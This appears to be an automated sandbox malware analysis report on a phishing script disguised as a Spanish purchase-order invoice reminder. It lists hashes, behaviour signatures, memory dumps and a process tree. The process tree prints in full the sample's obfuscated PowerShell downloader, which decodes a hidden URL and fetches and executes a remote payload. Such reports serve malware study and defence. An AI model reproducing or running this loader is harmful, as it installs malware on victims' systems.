Overview

overview

10

Static

static

1

Recordator...10.wsf

windows7-x64

8

Recordator...10.wsf

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15-10-2024 08:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Recordatorio de orden de compra - factura numero 2024-10.wsf

  • Size

    8KB

  • MD5

    abe356554178ad255021d0334f8950b5

  • SHA1

    2ab70f593dde24a0bb0b6ad7258069b1735d3889

  • SHA256

    554a5dbed0ecc5f4cceab8042d8d3d2d9587f43507e0150bb3df9f01b4de88d6

  • SHA512

    8d7179a5adbdb097c7d029793b4c72115a0fcace5298e306d5ae6a46107dd3be2f689d385672b4452588a0f3823ac02a2caf2221499791eeff4e3b4280647de3

  • SSDEEP

    192:FF6VUXhzSkGC0aiYrfOFpXyig0rmDMfIwagGgFFAV+:eIjDtOZZfVagbFFAV+

Score
8/10
discovery

Malware Config

Signatures

  • Blocklisted process makes network request 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Recordatorio de orden de compra - factura numero 2024-10.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping aszzzw_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2792
      • C:\Windows\system32\PING.EXE
        ping aszzzw_6777.6777.6777.677e
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2940
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#kroplusenes Landsforeningens Biltelefonen Ichthyosis Glucuronic Foryngelseskur #>;$Toshes61='indsneget';<#Speronara Dokhavnens Dekatren Bakkebord Akers Aarhundredskiftes Storvildtets #>;$Scatterplot=$abbeds+$host.UI;If ($Scatterplot) {$Anstrengelsen120++;}function Expressionless($Tevarmerens){$Piperidge177=$tusindet+$Tevarmerens.'Length'-$Anstrengelsen120; for( $whosomever=4;$whosomever -lt $Piperidge177;$whosomever+=5){$unstretched++;$Afkrydsningssystemer+=$Tevarmerens[$whosomever];$Tarnished='Hershey';}$Afkrydsningssystemer;}function Labouring44($peelhouse){ &($Dermatolog) ($peelhouse);}$Markhild=Expressionless 'ParkMUnwio Ankz BetiColmlBasslSmaaaP le/Gejs ';$Markhild+=Expressionless 'Auto5 nex.Slow0 ard Umb(SlvaW,rupiFa anTr odWhiroKl nwStilsun e Ro tNud iT Unn Ante1Kryd0Er i.Sigr0Pycn;Ptoc ,laWMoyii upen Sup6S ri4Ep x;Fore QuixBac,6Hens4ver ; Kr U strDishv Toi:Flyv1Diaz3Ko e1ball.Isme0Bl e)b.hr SamsGMus.eColocRe,ekAandoOd u/Am.h2Digt0 ,ir1V ri0Clea0,rag1Hasp0Dest1Udby TapFHarpiUtrir Phee Forf SlyoLurkx rhv/P.ec1 Dev3Epik1 con.Mari0Feat ';$Dungon=Expressionless ' Smau serS BareAdelRSkud-EmisaBa lGcalcE Di NFor tdata ';$Irrelevances=Expressionless 'UnblhVerst TestamoepBeg :Demo/ Jo /uplecE inaC ror ekse spreImportra.fGudsi lanBuckdEmbleSnugr Pda. le rTrivo.ube/ RatIBilgmDan,pdemio sttAnonaS,ydn Pret ap.Krimp erosSubedA va ';$Rykkets=Expressionless 'Ove.>Quad ';$Dermatolog=Expressionless 'Salai MareC,nsxArmo ';$Dobbeltarbejdes='Ubestandigheder';$Tilgangsregulerings='\Etherism.ska';Labouring44 (Expressionless 'Dis $PlsegGy nlAfkbOStr bN ziaInhul Ud :SkottArg ISydsd ProSMrkbShypeK De,RafhaIMiljF F,stStrasSuffaFishRGhosTFu diRockKrelaeR teLPitheUnanN Re.=Like$Li geHid.nGescV Bul:PsalahalspHumoPTeksDA,imAUnp.tMonoA re+Boli$ D pt,oseiNonpLBrndGMilia Ov nSer,g lus,uldR NgleMi cGr.llUSmerlcorye Samr.ndsiAr eNOpslgA sySAggl ');Labouring44 (Expressionless 'Sive$TermgSunnlAlphoUnplBDi.eASpe L st:BrddGS loNIndiIT iasBaldtRigsselekPNonan.estdTranIMaksn SamgApt EArchr ErhS Bry=Ble $Me aiTai.runmirunsteurskLIn tE PerVFo fa KonnEfficRadiEFrpesNond.N taS L.spmisplSp giMorptInfi(Ked.$ Ozor UpbYThe,KT,sskGninePrakt Bi sReve)peri ');Labouring44 (Expressionless 'oplg[ CabnImp eHyp tLuis. ,pgs P,aELectrMi,rv TiliAfstcUdpoEForep eorO TheiRestNDepaT UniMSoleA.magnSpecaSumpG S.rE KlaRFaen]Tria:tole:SnekSStraeEnkecMot.U AlbRIntei Kb,TBolsY ,obpt nkR PeeO UntT Bl.o Da cPinkOPrimlOver Vir= Kir Sejl[BortnhairEDecatUdar.OverSSvinebeswc creUStreR StyiAfspTTripy Tynp olkRKal OTyngtIn eo Strc AntoTow.LAmmotTru yAfbap FakESkyl]Unde:Crip:PasttannoL pgas ele1Fren2Hldr ');$Irrelevances=$Gnistspndingers[0];$Udvidelsesprint=(Expressionless 'Revi$Speag ForLSeenoExcoB To aAcetLOrdb:Fo mutachN HemfDykkOIn uALeviMLegeiE donHemeG pr=Ko,tn DefEErotwGros-E isoB rebSnowJMetee,oinCSh rtLand CenSMiddYtrofSUnnyT UrtEResemHy r.Du mnNonaEForuTBasn.B vgw .reE.ayob enscPunclMagtiY leEKnalNKamptSnes ');Labouring44 ($Udvidelsesprint);Labouring44 (Expressionless 'Rent$ Sp USalanFedtfCouno Re aEkspm VatiVivenT,icgImpr.BesmH,ndkeSlaga EpidmajbeHaarrRun s Lan[Sate$Dep DN meu Wa nPhilgGateoSkl nNed ]S,jd=Staa$Be,iM Bloa petrTotakPerdh Supiequ lBeggdStep ');$Monistic=Expressionless 'Tric$ DodUD.denKempfPresoJuxtaRaccmDrejiBet nFostgHind. ElvDSunloMar wFletn verlIr noLit.a Spyd ndrFDerai lubl PreeT en(Wire$MetaIReturDimeromfoeBeaul AstebestvBidaaDrunnIntecP aseAllosR pu,Fren$ ro LHaggi Victlatii,ripg DelaDucht ComoVelgr Geay roq) ,ku ';$Litigatory=$Tidsskriftsartikelen;Labouring44 (Expressionless 'Sol $Y,mrggadelUopnoSammbTapiaBagglSe,p:Lundt.iogIBoruM KurE gelsk nRTrooeMo nRCodiSEfte1Anet9 Gyo2 Cer=Unsu(Caret h reI teSI let Sk -overpEtolAStevtEnk hFos Forr$LepiLKonniOrdkt SimIEngagF urA ProtRepro NegR LovyBiks) Sk ');while (!$Timelrers192) {Labouring44 (Expressionless 'Unin$Ddlkg.utrlForhoSonob leuaRo,glK nt:ScubIExoan .emgUdp eperirBeselBegriYentsListe.amb=Hyph$honntTa.br Sa,uSvbeeBe l ') ;Labouring44 $Monistic;Labouring44 (Expressionless 'BetaS.mbutArchATrocR test Te.-WafeS Ex lHypse dkneKap.PYoup K nt4Unmi ');Labouring44 (Expressionless 'U co$T,eogHy eLKalvOLigkBEmotasolal T t: ,tyTCas iUvulmFeriEHierLChefRFlnsEAstaRvicksCucu1P.og9Decl2 umn= sem( FortBlomeSgetSVedltOkke-ResupAppaaKrydTPaviHLesc U ul$ HjelKaroI K otTegniSvrdG SilaUnplTDyewo WraRBadeyGust) K.e ') ;Labouring44 (Expressionless 'Snek$A svGKvallbj,noPeribIganAungalTrit:StarhNo muMas mFundBAnlglSclei CranQu.eGPochlAppaYEfte=Disp$misogMuhalMarkoForsB FreAAfkrlBr d: ShaC Pa O EftEPrimRslisCsk liBranOPendN AfhSHoft+U,an+Elsk% yva$Li.cG SerN gesIMiscs AskTCoelSTa sPBlasnPennDIdioIbranNGeneGabalEteksr lodsFler.GrowcFiniOAlsaUcas.nUngrtInfi ') ;$Irrelevances=$Gnistspndingers[$Humblingly];}$Taxometer=310299;$Lderpungenes=30608;Labouring44 (Expressionless 'Yppi$LucrgapocLblegoHandb SluAL tvLTryk:HaulO abiS KlitScabEAirwnSol,sOutfi WasbTullL TuvYk,mp3H,xa4Allo er=Byld Obscg,ranEZygat ce-C udCbadeoBeskNOlogT TyveReneNV.ndtPe m sto$Tmr,l ScaiHol.TFathIsarcgVeriaFlueTFm,pOAfblRideoyRed. ');Labouring44 (Expressionless ' M,r$ ,asgbigulP.scoLysibCer aTylvljuri:UnboHSnooa ,kgd BeteE odfFlaguPhotlWea dFjlleScalsGoaltHbjre ,ors era6D co0Angi omph= Pa Moe [ ndiS bulySer,sIntetMandeVigtmtea .Non,C Kaso CivnEstovkns eGemer .ldtGuds]myri: slf: VebFAn lrfacko Hinm eodBSimpaCrissImpoe rre6 sk 4 eaS KortG mbrDiskiSubqn pthgFene(Dera$KlunOpsors KortFyrseprinnLab.sBrndi Apeb SollBrigydama3Enth4 l v)Fu l ');Labouring44 (Expressionless 'Fora$DagsgLandlKendoExudbFinga A tLSmoo:MajoHImpreNonel Spaf neqlAfreUSporGDirkTBr dEIn,arSli Meka=Cam, P.ss[ unfS OveyGrunSManqtSpatEOtahmChor.G let SpieburgxSundTVedl.T xiEFrecnK.licPh.eo ComdGli iT trn CerG Skv] uto:Kreb:LituaSiteSSt lCDr.kiSildIHval.Sti GSnkeeRuskTFor,SSteatMi,irMi.iIManynReviGJenl(Caro$Gem HA.claAf.ndblo eUltrFMis.uTemuLRecoDarbeeSpi SSeirt U seAmpusS an6Boli0Sel )Al,h ');Labouring44 (Expressionless 'Repr$turbgFrowLEpilOJosebre.yA AnlL.erp:A.lwPUptuIDeren Um Uno cLBnkeU ElasMask= ri$ Wh hD.apEIntel,iviFFl,vlDitcUD ddg S kTProeECup RB lr.philSSlgtUSkovbKritSNorttNoncrgurkI T lNDegeGRaad(Bevi$ KentMultaGe nXSinko Mormpa eeOratT KawEUnderOphi,Just$ GyrLCo,pd,notEJuleRSubiPDoxouSuspnGaigG ele rotn BygeHa,is,rkp)Vas ');Labouring44 $Pinulus;"
      2⤵
      • Blocklisted process makes network request
      • System Time Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2444

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2444-4-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2444-5-0x000000001B670000-0x000000001B952000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2444-6-0x0000000002770000-0x0000000002778000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2444-7-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-8-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-11-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-10-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-9-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-12-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2444-13-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-14-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download